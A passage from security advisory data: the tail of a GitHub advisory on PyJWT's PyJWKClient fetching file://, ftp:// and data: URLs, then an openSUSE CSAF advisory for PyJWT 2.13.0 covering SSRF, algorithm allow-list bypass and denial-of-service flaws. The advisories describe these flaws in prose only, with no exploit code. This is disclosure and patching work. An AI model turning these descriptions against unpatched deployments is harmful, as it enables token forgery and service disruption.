overwhelming majority of callers using HTTP/HTTPS JWKS endpoints\n- Breaking only for callers using non-HTTP schemes intentionally (vanishingly rare)\n- No changes to urllib fetch logic itself \u2014 the fix is a pre-validation gate\n\n## Class precedent\n\nThis is the same class as **CVE-2024-21643** (Apache Jena JKU-trust: attacker-supplied JKU URL fetched without scheme validation). 
NVD-rated CVSS 7.5.\n\n## Prior art (verified 2026-05-06)\n\nConfirmed via live recon (NVD direct, OSV.dev, PyJWT GitHub Security Advisories, issue/PR keyword search, CHANGELOG inspection):\n\n- No existing CVE on PyJWT specifically for PyJWKClient URL scheme handling\n- No existing GitHub issue or PR addressing scheme allowlisting\n- No silent fix in CHANGELOG through 2.12.1\n- 5 prior PyJWT advisories (CVE-2017-11424, CVE-2022-29217, CVE-2024-53861, CVE-2025-45768, CVE-2026-32597) \u2014 none cover this class\n\n## Credit\n\nReported by Keijo Tuominen \u2014 independent security research at CMHT.tech (https://cmht.tech).\n\nReproduction artifacts available on request: full multi-language probe pack (5 wrappers \u00d7 25 fixtures \u00d7 125 cells) demonstrating cross-library divergence at the URL-scheme boundary.",
"id": "GHSA-993g-76c3-p5m4",
"modified": "2026-06-15T19:28:41Z",
"published": "2026-06-15T19:28:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48522"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-175.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "PyJWKClient: missing scheme allowlist enables CVE-2024-21643-class SSRF + token forgery via file://, ftp://, data: schemes"
}
OPENSUSE-SU-2026:11024-1
Vulnerability from csaf_opensuse - Published: 2026-06-13 00:00 - Updated: 2026-06-13 00:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64 | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "python311-PyJWT-2.13.0-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the python311-PyJWT-2.13.0-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-11024",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11024-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48522 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48522/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48523 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48523/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48524 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48524/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48525 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48525/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-48526 page",
"url": "https://www.suse.com/security/cve/CVE-2026-48526/"
}
],
"title": "python311-PyJWT-2.13.0-1.1 on GA media",
"tracking": {
"current_release_date": "2026-06-13T00:00:00Z",
"generator": {
"date": "2026-06-13T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:11024-1",
"initial_release_date": "2026-06-13T00:00:00Z",
"revision_history": [
{
"date": "2026-06-13T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python311-PyJWT-2.13.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python313-PyJWT-2.13.0-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.aarch64",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.aarch64",
"product_id": "python314-PyJWT-2.13.0-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python311-PyJWT-2.13.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python313-PyJWT-2.13.0-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.ppc64le",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.ppc64le",
"product_id": "python314-PyJWT-2.13.0-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.s390x",
"product_id": "python311-PyJWT-2.13.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.s390x",
"product_id": "python313-PyJWT-2.13.0-1.1.s390x"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.s390x",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.s390x",
"product_id": "python314-PyJWT-2.13.0-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "python311-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python311-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python311-PyJWT-2.13.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python313-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python313-PyJWT-2.13.0-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "python314-PyJWT-2.13.0-1.1.x86_64",
"product": {
"name": "python314-PyJWT-2.13.0-1.1.x86_64",
"product_id": "python314-PyJWT-2.13.0-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python311-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python313-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python314-PyJWT-2.13.0-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
},
"product_reference": "python314-PyJWT-2.13.0-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48522",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48522"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48522",
"url": "https://www.suse.com/security/cve/CVE-2026-48522"
},
{
"category": "external",
"summary": "SUSE Bug 1266798 for CVE-2026-48522",
"url": "https://bugzilla.suse.com/1266798"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48522"
},
{
"cve": "CVE-2026-48523",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48523"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.9.0 to 2.12.1, there is a verifier-side algorithm allow-list bypass when jwt.decode() or jwt.decode_complete() are called with a PyJWK key. The token header alg is checked against the caller-supplied algorithms allow-list, but signature verification is performed with the algorithm bound to the PyJWK object instead of the header algorithm. An attacker who controls a registered JWK/JWKS private key can sign with a disallowed algorithm, advertise an allowed algorithm in the JWT header, and still be accepted. The issue affects the documented PyJWKClient.get_signing_key_from_jwt(...) flow. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48523",
"url": "https://www.suse.com/security/cve/CVE-2026-48523"
},
{
"category": "external",
"summary": "SUSE Bug 1266799 for CVE-2026-48523",
"url": "https://bugzilla.suse.com/1266799"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-48523"
},
{
"cve": "CVE-2026-48524",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48524"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests. The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48524",
"url": "https://www.suse.com/security/cve/CVE-2026-48524"
},
{
"category": "external",
"summary": "SUSE Bug 1266800 for CVE-2026-48524",
"url": "https://bugzilla.suse.com/1266800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-13T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2026-48524"
},
{
"cve": "CVE-2026-48525",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-48525"
}
],
"notes": [
{
"category": "general",
"text": "PyJWT is a JSON Web Token implementation in Python. From 2.8.0 to 2.12.1, when verifying detached JWS tokens using the unencoded-payload option (\"b64\": false, RFC 7797), PyJWT performs Base64URL decoding of the compact-serialization payload segment before enforcing the detached-payload rules. For b64=false, PyJWT later discards that decoded payload and replaces it with the caller-provided detached_payload. In practice, this turns the middle segment into an attacker-controlled \u201cwork amplifier\u201d: a remote client can supply an arbitrarily large Base64URL payload segment that forces CPU work + memory allocations even if the signature is invalid. This creates an unauthenticated DoS vector against any endpoint that verifies detached JWS using PyJWT. This vulnerability is fixed in 2.13.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-48525",
"url": "https://www.suse.com/security/cve/CVE-2026-48525"
},
{
"category": "external",
"summary": "SUSE Bug 1266801 for CVE-2026-48525",
"url": "https://bugzilla.suse.com/1266801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python311-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.s390x",
"openSUSE Tumbleweed:python313-PyJWT-2.13.0-1.1.x86_64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.aarch64",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.ppc64le",
"openSUSE Tumbleweed:python314-PyJWT-2.13.0-1.1.s390x",
